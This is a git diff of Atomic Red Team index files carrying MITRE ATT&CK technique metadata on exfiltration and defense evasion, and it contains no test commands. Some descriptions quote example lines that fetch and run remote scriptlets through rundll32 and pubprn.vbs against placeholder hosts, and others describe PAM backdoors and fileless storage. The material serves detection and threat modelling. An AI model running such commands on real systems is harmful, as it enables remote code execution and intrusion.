       id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
       created: '2020-10-19T13:40:11.118Z'
@@ -60772,9 +61654,8 @@ exfiltration:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.001:
     technique:
@@ -60821,7 +61702,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1048.002:
     technique:
@@ -60847,7 +61727,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:44:11.953Z'
       name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
         Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -60880,13 +61760,11 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1048.002
     atomic_tests: []
   T1041:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:09:14.040Z'
       name: Exfiltration Over C2 Channel
       description: Adversaries may steal data by exfiltrating it over an existing
         command and control channel. Stolen data is encoded into the normal communications
@@ -60935,12 +61813,11 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1041
     atomic_tests: []
   T1048:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:57:26.415Z'
       name: Exfiltration Over Alternative Protocol
       description: "Adversaries may steal data by exfiltrating it over a different
         protocol than that of the existing command and control channel. The data may
@@ -60976,12 +61853,11 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Network
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Access'
       - 'Network Traffic: Network Traffic Flow'
@@ -60990,7 +61866,6 @@ exfiltration:
       - 'Application Log: Application Log Content'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
       created: '2017-05-31T21:30:44.720Z'
@@ -61014,9 +61889,8 @@ exfiltration:
         url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048
     atomic_tests: []
   T1052.001:
@@ -61039,7 +61913,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1052.001
         url: https://attack.mitre.org/techniques/T1052/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.490Z'
       name: Exfiltration over USB
       description: Adversaries may attempt to exfiltrate data over a USB connected
         physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -61061,8 +61935,6 @@ exfiltration:
       - 'Command: Command Execution'
       x_mitre_system_requirements:
       - Presence of physical medium or device
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1567.003:
     technique:
@@ -61113,7 +61985,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.003
     atomic_tests: []
   T1567.002:
@@ -61163,7 +62034,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.002
     atomic_tests: []
   T1030:
@@ -61188,7 +62058,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:47:46.912Z'
       name: Data Transfer Size Limits
       description: An adversary may exfiltrate data in fixed size chunks instead of
         whole files or limit packet sizes below certain thresholds. This approach
@@ -61211,13 +62081,11 @@ exfiltration:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1030
     atomic_tests: []
   T1537:
     technique:
-      modified: '2024-04-11T15:53:00.577Z'
+      modified: '2024-10-15T16:08:25.344Z'
       name: Transfer Data to Cloud Account
       description: "Adversaries may exfiltrate data by transferring the data, including
         through sharing/syncing and creating backups of cloud environments, to another
@@ -61258,9 +62126,8 @@ exfiltration:
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Modification'
       - 'Snapshot: Snapshot Creation'
@@ -61308,7 +62175,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1052:
     technique:
@@ -61330,7 +62196,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1052
         external_id: T1052
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.702Z'
       name: Exfiltration Over Physical Medium
       description: Adversaries may attempt to exfiltrate data via a physical medium,
         such as a removable drive. In certain circumstances, such as an air-gapped
@@ -61354,12 +62220,10 @@ exfiltration:
       x_mitre_system_requirements:
       - Presence of physical medium or device
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1048.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:39:25.476Z'
       name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
         Non-C2 Protocol'
       description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -61423,6 +62287,5 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048.003
     atomic_tests: []
diff --git a/atomics/Indexes/iaas-index.yaml b/atomics/Indexes/iaas-index.yaml
index 1ac83b1d66..44ed384822 100644
--- a/atomics/Indexes/iaas-index.yaml
+++ b/atomics/Indexes/iaas-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,13 +97,11 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -166,21 +164,27 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-04T15:05:25.388Z'
       name: Fileless Storage
       description: "Adversaries may store data in \"fileless\" formats to conceal
         malicious activity from defenses. Fileless storage can be broadly defined
         as any format other than a file. Common examples of non-volatile fileless
-        storage include the Windows Registry, event logs, or WMI repository.(Citation:
-        Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
-        in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+        storage in Windows systems include the Windows Registry, event logs, or WMI
+        repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+        Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+        and `/var/lock` may also be considered fileless storage, as files written
+        to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+        Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+        2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+        behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
         and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
         data storage may remain undetected by anti-virus and other endpoint security
-        tools that can only access specific file formats from disk storage.\n\nAdversaries
+        tools that can only access specific file formats from disk storage. Leveraging
+        fileless storage may also allow adversaries to bypass the protections offered
+        by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
         may use fileless storage to conceal various types of stored data, including
         payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
         and collected data not yet exfiltrated from the victim (e.g., [Local Data
@@ -200,6 +204,7 @@ defense-evasion:
       - Mark Wee
       - Simona David
       - Xavier Rousseau
+      - Vito Alfano, Group-IB
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -207,10 +212,12 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.0'
+      - Linux
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'WMI: WMI Creation'
+      - 'Process: Process Creation'
       type: attack-pattern
       id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
       created: '2023-03-23T19:55:25.546Z'
@@ -220,6 +227,14 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1027/011
         external_id: T1027.011
+      - source_name: Aquasec Muhstik Malware 2024
+        description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+          Queuing Services Applications. Retrieved September 24, 2024."
+        url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+      - source_name: Elastic Binary Executed from Shared Memory Directory
+        description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+          Retrieved September 24, 2024.
+        url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
       - source_name: SecureList Fileless
         description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
           Retrieved March 23, 2023.
@@ -228,15 +243,22 @@ defense-evasion:
         description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
           23, 2023.
         url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+      - source_name: Sysdig Fileless Malware 23022
+        description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+          September 24, 2024.
+        url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+      - source_name: Akami Frog4Shell 2024
+        description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+          Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+        url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.011:
     technique:
-      modified: '2023-08-14T15:35:28.965Z'
+      modified: '2024-10-14T13:14:43.083Z'
       name: 'Signed Binary Proxy Execution: Rundll32'
       description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
         code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -247,10 +269,10 @@ defense-evasion:
         also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
         Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code>
         and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes
-        rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
-        be used to execute scripts such as JavaScript. This can be done using a syntax
-        similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
-        \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
+        rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+        can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+        scripts such as JavaScript. This can be done using a syntax similar to this:
+        <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
         \ This behavior has been seen used by malware such as Poweliks. (Citation:
         This is Security Command Line Confusion)\n\nAdversaries may also attempt to
         obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -286,7 +308,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -316,7 +338,7 @@ defense-evasion:
       - source_name: This is Security Command Line Confusion
         description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
           Retrieved March 5, 2018.
-        url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+        url: https://www.stormshield.com/news/poweliks-command-line-confusion/
       - source_name: Github NoRunDll
         description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
           2021.
@@ -327,9 +349,8 @@ defense-evasion:
         url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.011
     atomic_tests: []
   T1027.009:
@@ -419,49 +440,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -476,20 +458,57 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1578.004:
@@ -518,7 +537,7 @@ defense-evasion:
         url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
         description: Google. (2019, October 7). Restoring and deleting persistent
           disk snapshots. Retrieved October 8, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-08T10:33:02.128Z'
       name: Revert Cloud Instance
       description: |-
         An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
       - 'Instance: Instance Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.012:
     technique:
@@ -588,7 +605,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.002:
     technique:
@@ -666,7 +682,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.002
     atomic_tests: []
   T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
         Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
 
         In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:55:35.817Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Script Proxy Execution: Pubprn'
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216.001
     atomic_tests: []
   T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1006:
     technique:
@@ -870,12 +883,87 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1006
     atomic_tests: []
+  T1666:
+    technique:
+      modified: '2024-09-25T16:15:41.224Z'
+      name: Modify Cloud Resource Hierarchy
+      description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+        (IaaS) environments in order to evade defenses.  \n\nIaaS environments often
+        group resources into a hierarchy, enabling improved resource management and
+        application of policies to relevant groups. Hierarchical structures differ
+        among cloud providers. For example, in AWS environments, multiple accounts
+        can be grouped under a single organization, while in Azure environments, multiple
+        subscriptions can be grouped under a single management group.(Citation: AWS
+        Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+        delete, or otherwise modify resource groups within an IaaS hierarchy. For
+        example, in Azure environments, an adversary who has gained access to a Global
+        Administrator account may create new subscriptions in which to deploy resources.
+        They may also engage in subscription hijacking by transferring an existing
+        pay-as-you-go subscription from a victim tenant to an adversary-controlled
+        tenant. This will allow the adversary to use the victim’s compute resources
+        without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+        2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+        adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+        API, causing the account to be severed from the AWS Organization to which
+        it was tied and removing any Service Control Policies, guardrails, or restrictions
+        imposed upon it by its former Organization. Alternatively, adversaries may
+        call the `CreateAccount` API in order to create a new account within an AWS
+        Organization. This account will use the same payment methods registered to
+        the payment account but may not be subject to existing detections or Service
+        Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      type: attack-pattern
+      id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+      created: '2024-09-25T14:16:19.234Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1666
+        external_id: T1666
+      - source_name: AWS Organizations
+        description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+          Retrieved September 25, 2024.
+        url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Microsoft Subscription Hijacking 2022
+        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+      - source_name: Microsoft Azure Resources
+        description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+          effectively. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+      - source_name: Microsoft Peach Sandstorm 2023
+        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+          password spray campaigns enable intelligence collection at high-value targets.
+          Retrieved September 18, 2023.
+        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.008:
     technique:
-      modified: '2023-10-16T16:41:53.957Z'
+      modified: '2024-10-15T15:56:27.592Z'
       name: 'Hide Artifacts: Email Hiding Rules'
       description: |-
         Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
@@ -901,11 +989,10 @@ defense-evasion:
       x_mitre_is_subtechnique: true
